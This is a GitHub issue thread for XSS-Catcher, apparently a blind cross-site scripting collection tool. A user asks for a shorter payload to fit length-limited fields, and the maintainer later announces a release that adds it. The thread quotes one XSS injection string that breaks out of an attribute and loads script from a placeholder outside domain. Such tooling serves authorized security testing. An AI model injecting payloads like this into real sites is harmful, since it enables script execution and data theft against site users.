### ISSUE TITLE
[Enhancement] Smaller Payloads

### ISSUE THREAD

**Issue by vermsec** [daxAKAhackerman/XSS-Catcher#26]
Hi, can we have supports for smaller payloads as well? lot of times the payload doesn't work just because the field is char limited by the server. 

Would really like to see a payload like - `"><script src=https://xss.domain.tld></script>`

**Comment by daxAKAhackerman** [comment]
I could add a default behaviour to the collector script to allow for shorter payloads. Will look into it!

**Comment by mrrootsec** [comment]
@daxAKAhackerman Shorter payload added??

**Comment by daxAKAhackerman** [comment]
Hey 👋 Not yet, I was working on lots of other projects 😅 However, I will have time to give a bit of love to XSS-Catcher during the Holidays, so stay tuned for a new release in the next few days 🎉

**Comment by daxAKAhackerman** [comment]
This was not too complicated to achieve, so I was able to do it today 🥳 Have a look at the release notes for more details: https://github.com/daxAKAhackerman/XSS-Catcher/releases/tag/v1.7.0
